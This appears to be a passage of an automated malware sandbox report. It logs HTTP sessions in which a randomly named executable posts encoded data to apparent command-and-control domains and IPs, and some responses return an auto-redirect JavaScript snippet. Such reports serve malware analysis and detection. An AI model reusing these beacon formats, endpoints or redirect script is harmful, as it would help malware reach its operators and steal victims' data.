                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.94985127.124.4.246801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:13:24.390343904 CET768OUTPOST /sgdd/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.laohub10.net
                                                      Origin: http://www.laohub10.net
                                                      Referer: http://www.laohub10.net/sgdd/
                                                      Cache-Control: no-cache
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 36 55 6f 50 53 48 6e 66 76 5a 41 4c 76 79 58 66 75 62 76 7a 6c 30 4d 4f 72 4b 6d 78 74 50 59 59 46 50 2b 6d 63 55 42 55 70 57 37 54 68 2f 44 4d 52 64 32 76 49 39 68 70 55 33 41 44 31 64 55 41 32 64 4b 41 6e 4e 76 53 4c 54 78 44 4f 67 67 52 62 72 31 65 4e 71 79 4d 6e 5a 6a 4a 6e 41 61 69 4d 43 65 39 67 4e 77 39 65 64 75 34 6b 75 52 6d 2b 70 62 43 4f 64 42 66 61 37 6a 51 6b 73 71 38 62 6b 52 58 7a 4b 69 2b 51 2f 35 73 47 7a 52 71 39 76 58 52 68 76 30 61 30 30 57 4d 6c 41 2f 68 7a 41 51 49 6e 4e 36 56 77 3d 3d
                                                      Data Ascii: 6vSXrZxp=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we6UoPSHnfvZALvyXfubvzl0MOrKmxtPYYFP+mcUBUpW7Th/DMRd2vI9hpU3AD1dUA2dKAnNvSLTxDOggRbr1eNqyMnZjJnAaiMCe9gNw9edu4kuRm+pbCOdBfa7jQksq8bkRXzKi+Q/5sGzRq9vXRhv0a00WMlA/hzAQInN6Vw==
                                                      Nov 24, 2024 08:13:25.775538921 CET525INHTTP/1.1 200 OK
                                                      Server: Apache
                                                      Content-Type: text/html; charset=utf-8
                                                      Accept-Ranges: bytes
                                                      Cache-Control: max-age=86400
                                                      Age: 1
                                                      Connection: Close
                                                      Content-Length: 350
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.94985727.124.4.246801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:13:27.053759098 CET1781OUTPOST /sgdd/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.laohub10.net
                                                      Origin: http://www.laohub10.net
                                                      Referer: http://www.laohub10.net/sgdd/
                                                      Cache-Control: no-cache
                                                      Content-Length: 1233
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 38 4d 6f 50 6e 54 6e 4e 38 78 41 4b 76 79 58 54 4f 62 75 7a 6c 30 52 4f 72 6a 74 78 74 43 6a 59 47 6e 2b 70 5a 41 42 54 59 57 37 4a 78 2f 44 54 68 64 7a 73 34 38 6a 70 56 61 4a 44 31 4e 55 41 32 64 4b 41 6b 56 76 62 2f 2f 78 42 4f 67 6a 59 37 72 35 4a 64 72 58 4d 6d 78 7a 4a 6d 51 67 6a 34 2b 65 2b 41 64 77 2b 73 31 75 33 6b 75 54 71 65 70 44 43 4f 52 43 66 61 6d 59 51 6b 59 54 38 63 6f 52 48 6b 50 6e 6b 6a 37 67 34 46 6e 63 73 36 65 72 5a 30 54 70 53 46 70 74 53 31 67 4a 34 79 70 46 46 45 6f 67 46 47 31 41 31 4d 7a 33 46 55 66 57 2b 76 48 35 76 73 49 78 4e 2f 33 54 52 7a 4f 6a 6d 6c 59 32 6e 6f 5a 70 62 48 48 36 30 71 4d 31 54 76 6c 32 6d 4d 4a 2f 6c 49 61 68 6a 43 73 4c 65 5a 37 38 75 45 53 68 51 39 6c 44 2b 52 45 5a 43 5a 64 4d 50 2b 36 57 36 56 4c 59 58 62 34 49 2f 42 61 55 43 6c 2f 73 4a 45 74 43 78 6e 32 4d 57 54 31 32 76 74 31 35 38 75 4e 6b 53 [TRUNCATED]
                                                      Data Ascii: 6vSXrZxp=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we8MoPnTnN8xAKvyXTObuzl0ROrjtxtCjYGn+pZABTYW7Jx/DThdzs48jpVaJD1NUA2dKAkVvb//xBOgjY7r5JdrXMmxzJmQgj4+e+Adw+s1u3kuTqepDCORCfamYQkYT8coRHkPnkj7g4Fncs6erZ0TpSFptS1gJ4ypFFEogFG1A1Mz3FUfW+vH5vsIxN/3TRzOjmlY2noZpbHH60qM1Tvl2mMJ/lIahjCsLeZ78uEShQ9lD+REZCZdMP+6W6VLYXb4I/BaUCl/sJEtCxn2MWT12vt158uNkSRRsoDIuAYXTHq8wi+RtikKYlVcAFtdIfvl3K2pKNWTnEw8UcY4VhS0CYy7OlshfHgArW9u4saxfYEKBUM9n+UlVzl29Z6Y3wevJr0WZga5FAE4gn1Lt6xn/RaedHbT4+jMvRqIj0gQhTgfref3qPNVHoKZFRfgjqlNZKA4o9EpGl41Y3hT8z6VXvhSDEICUKgoBfBYQ5b834Y4lk7sCZ07PM9vMjckvT2X0tPv4Renr4tgUNZ9BnCM1Vw8cMyJjg2xiS6dDm88PLE6kaauL5GJexBK1VvPziAmWzUe6vM5zYVlXSRKKZ/jJaW9+/c5LO291tQMSovrCQckzykByqc0FxC6R89KqL/G2IO/aghVVClHyEwz/+UuUX+d8e9UbWdFs3B0IkJrTzz0pBsH6+zXkrxMqfzO1mw51VQ8Su3sI1e8zYwYJIopIdAZqeS7YwE/OKMKG6wQ1iXcYWGZH4aTSbSnHhMj9bXu6z3IndFAxkdqueVdk2xgegiFabZEcq+QXo54n5yHnTXTjlliOMdXKYu4FyOEpPTWRZpSex80I4nKkKgp9ZoUPwmmuFCLqoRhK/6dYNIlP8H1yKQlhdcI0XVQ/PZ3ZS+OZmEEnhpN3Tg2Mzor86CffJsxdMT5eaXu4c5+PUDyUGxv3Eiuk/P4XlazAd/N4AV1 [TRUNCATED]
                                                      Nov 24, 2024 08:13:28.431194067 CET525INHTTP/1.1 200 OK
                                                      Server: Apache
                                                      Content-Type: text/html; charset=utf-8
                                                      Accept-Ranges: bytes
                                                      Cache-Control: max-age=86400
                                                      Age: 1
                                                      Connection: Close
                                                      Content-Length: 350
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.94986327.124.4.246801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:13:29.712353945 CET478OUTGET /sgdd/?6vSXrZxp=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZCyCtFSFHqJZS4hLcKGIJEWFKX2dKFA==&av=Zj6TS2 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US
                                                      Host: www.laohub10.net
                                                      Connection: close
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Nov 24, 2024 08:13:31.067595005 CET525INHTTP/1.1 200 OK
                                                      Server: Apache
                                                      Content-Type: text/html; charset=utf-8
                                                      Accept-Ranges: bytes
                                                      Cache-Control: max-age=86400
                                                      Age: 1
                                                      Connection: Close
                                                      Content-Length: 350
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                      Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.949883149.88.81.190801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:13:37.452442884 CET738OUTPOST /rq1s/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.xcvbj.asia
                                                      Origin: http://www.xcvbj.asia
                                                      Referer: http://www.xcvbj.asia/rq1s/
                                                      Cache-Control: no-cache
                                                      Content-Length: 197
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 6d 73 79 56 74 71 48 67 47 4a 33 6e 30 6e 2b 6c 65 58 2f 62 76 58 31 6d 69 43 48 37 42 35 53 36 6b 4e 68 56 4e 47 75 73 65 31 2f 31 6d 36 6f 63 4f 4d 76 6e 76 7a 63 4d 5a 30 45 53 76 6e 6b 31 39 79 59 67 31 42 33 73 61 6f 32 67 79 70 45 6e 64 71 2f 74 6f 42 30 53 79 43 57 4e 41 73 4c 51 71 74 6f 74 61 57 59 77 68 32 31 73 51 75 57 64 76 6e 6b 4e 4b 53 7a 42 4f 4b 79 47 6e 64 46 75 49 61 44 48 2f 41 2b 44 38 4a 79 39 2b 58 4c 35 75 68 6e 49 6b 48 51 4d 6b 36 44 2f 6e 79 78 6b 52 41 6c 2b 41 62 6c 4c 62 48 34 62 50 5a 33
                                                      Data Ascii: 6vSXrZxp=xj4K+ejgT/JOWmsyVtqHgGJ3n0n+leX/bvX1miCH7B5S6kNhVNGuse1/1m6ocOMvnvzcMZ0ESvnk19yYg1B3sao2gypEndq/toB0SyCWNAsLQqtotaWYwh21sQuWdvnkNKSzBOKyGndFuIaDH/A+D8Jy9+XL5uhnIkHQMk6D/nyxkRAl+AblLbH4bPZ3


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.949889149.88.81.190801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:13:40.112900972 CET762OUTPOST /rq1s/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.xcvbj.asia
                                                      Origin: http://www.xcvbj.asia
                                                      Referer: http://www.xcvbj.asia/rq1s/
                                                      Cache-Control: no-cache
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 52 53 6a 41 42 68 62 70 61 75 67 2b 31 2f 39 47 36 70 53 75 4d 6b 6e 76 32 70 4d 59 59 45 53 72 50 6b 31 2f 36 59 68 47 70 30 75 4b 6f 6a 35 43 70 47 6a 64 71 2f 74 6f 42 30 53 79 6e 37 4e 42 49 4c 4d 4c 64 6f 73 37 57 62 7a 68 32 79 72 51 75 57 5a 76 6e 67 4e 4b 53 30 42 4c 54 36 47 6b 31 46 75 49 4b 44 47 75 41 2f 5a 73 4a 38 35 2b 57 65 35 64 56 6a 42 57 2f 6b 53 43 6d 46 6d 30 4b 75 71 51 38 37 76 79 53 2b 65 4d 48 66 63 6f 51 66 65 69 5a 58 39 37 6c 2f 4e 56 79 4c 4b 70 6f 72 68 53 35 75 48 67 3d 3d
                                                      Data Ascii: 6vSXrZxp=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7URSjABhbpaug+1/9G6pSuMknv2pMYYESrPk1/6YhGp0uKoj5CpGjdq/toB0Syn7NBILMLdos7Wbzh2yrQuWZvngNKS0BLT6Gk1FuIKDGuA/ZsJ85+We5dVjBW/kSCmFm0KuqQ87vyS+eMHfcoQfeiZX97l/NVyLKporhS5uHg==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.949895149.88.81.190801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:13:42.781936884 CET1775OUTPOST /rq1s/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.xcvbj.asia
                                                      Origin: http://www.xcvbj.asia
                                                      Referer: http://www.xcvbj.asia/rq1s/
                                                      Cache-Control: no-cache
                                                      Content-Length: 1233
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 4a 53 2f 6c 64 68 55 6f 61 75 68 2b 31 2f 69 32 36 73 53 75 4d 35 6e 72 61 6c 4d 5a 6b 55 53 74 4c 6b 30 61 32 59 77 48 70 30 30 61 6f 6a 6b 79 70 4c 6e 64 72 39 74 6f 52 4b 53 79 58 37 4e 42 49 4c 4d 49 56 6f 39 71 57 62 2f 42 32 31 73 51 75 4b 64 76 6d 33 4e 4b 61 43 42 4c 65 59 47 56 56 46 74 6f 36 44 46 63 34 2f 53 73 4a 2b 31 65 58 64 35 64 49 39 42 57 7a 4f 53 43 37 67 6d 33 71 75 6f 32 70 57 31 79 57 32 4a 4d 50 6f 65 4a 4d 73 66 57 51 79 33 4f 30 73 55 56 79 47 63 4d 42 64 6c 7a 67 59 56 4c 4b 4c 41 34 54 43 50 6d 73 79 4d 5a 63 34 78 6f 46 68 65 6f 69 63 4b 49 55 2f 6c 50 65 43 50 76 71 73 6b 6a 46 72 79 39 64 69 39 66 58 78 31 77 53 74 4b 42 6b 2f 57 42 46 34 50 61 47 37 4f 77 47 75 74 30 34 35 70 42 38 75 2b 7a 4d 37 38 64 37 56 2b 56 76 32 35 51 37 6d 58 32 58 71 6e 4c 54 55 51 4b 46 65 38 4a 39 4e 6e 38 2f 44 66 6e 2b 37 43 2f 34 2b 6a [TRUNCATED]
                                                      Data Ascii: 6vSXrZxp=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7UJS/ldhUoauh+1/i26sSuM5nralMZkUStLk0a2YwHp00aojkypLndr9toRKSyX7NBILMIVo9qWb/B21sQuKdvm3NKaCBLeYGVVFto6DFc4/SsJ+1eXd5dI9BWzOSC7gm3quo2pW1yW2JMPoeJMsfWQy3O0sUVyGcMBdlzgYVLKLA4TCPmsyMZc4xoFheoicKIU/lPeCPvqskjFry9di9fXx1wStKBk/WBF4PaG7OwGut045pB8u+zM78d7V+Vv25Q7mX2XqnLTUQKFe8J9Nn8/Dfn+7C/4+jXqlFSMdCLIkw/STqEVxluvhR65C/53cFUngoj7pGH0C1M6Q9E/ohAmHdu52d2B+v91Lwiph01Xadcm+qHL85s/NS/OCS3hAYBYd8RxlvJg40wVIdjm6Qpcx476mFo1e1pcbv4eI8gA02+XazVEJGPCm2oe8FY/pSbYEsjR98sAoHKG1nE3EY+IL8JSLc7ZUjefZFjWYqmmkxZrtr0DsC/LJ+SCur5S6dEuJeurn5PE3t9ktZqc3x04awDzTGJem1LFvpSaHXuGVv8bkzFlliIsSs6oYJ3zUHNq+rOCD5u9NhKHfqSvWX70bGibNQ4dFCbC+hYy6h7L5JqFAHtnT3UNHBM48hI+wOiRvKPCamRooXf/nTgp4U+vFs87KRe6/X0UUUzdJHyNBVOlEFA09qnSW1mKc1SwbED6TdSezA+A5OhlVaeMi8w3o5gtlhcVxIOuSRI3FEDuLgxam/80GOXW3axMADPB/zxAWM9oRKehpYzxc93fBCkeCtZlL/8rgzQ7/5vCsAwLS3hlnPp0ZgYYMjc9ZKTLrxZS0rwsdsQtycTY6tgO0rLp0JVbT2vY0V7OS93La+S7K47LCk+j3iAxTJwEUMmrRJmbTuc4Q8166tuOPa7zzEEYQwn3TeSB6Gq2DfRiabpRKKGWHTfAgTWpnl/YgVREzEuU [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.949902149.88.81.190801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:13:45.447259903 CET476OUTGET /rq1s/?av=Zj6TS2&6vSXrZxp=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpFlLQlu0hJqsiOw5MBYhb6NnUPB5dt5g== HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US
                                                      Host: www.xcvbj.asia
                                                      Connection: close
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.94996785.159.66.93801980C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 24, 2024 08:14:13.715888023 CET747OUTPOST /rum2/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US
                                                      Host: www.soainsaat.xyz
                                                      Origin: http://www.soainsaat.xyz
                                                      Referer: http://www.soainsaat.xyz/rum2/
                                                      Cache-Control: no-cache
                                                      Content-Length: 197
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                      Data Raw: 36 76 53 58 72 5a 78 70 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 48 76 61 4c 35 69 4c 4f 6e 76 2f 34 51 4c 46 73 55 76 70 33 64 52 50 66 41 65 6b 6c 74 38 6a 32 30 31 6b 36 42 69 4c 61 61 44 58 6c 41 33 53 6d 49 6d 59 33 68 71 72 33 43 6b 4e 56 6c 4b 37 37 64 73 77 31 48 49 73 30 52 4e 61 73 73 39 53 55 56 44 61 76 34 71 5a 4c 55 78 2b 46 64 58 4b 44 33 33 72 38 37 59 32 59 59 76 55 48 59 73 63 4a 6f 48 78 43 71 44 4b 5a 33 43 55 57 42 2f 36 77 57 65 4f 66 41 57 6f 4f 58 6f 79 69 55 6c 72 46 4b 4a 52 70 70 5a 46 46 31 69 77 55 70 2f 47 39 33 66 67 77 73 48 6c 73 33 44 55 6a 4a 2b 39
                                                      Data Ascii: 6vSXrZxp=8OxGdHNGhDPGSHvaL5iLOnv/4QLFsUvp3dRPfAeklt8j201k6BiLaaDXlA3SmImY3hqr3CkNVlK77dsw1HIs0RNass9SUVDav4qZLUx+FdXKD33r87Y2YYvUHYscJoHxCqDKZ3CUWB/6wWeOfAWoOXoyiUlrFKJRppZFF1iwUp/G93fgwsHls3DUjJ+9


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
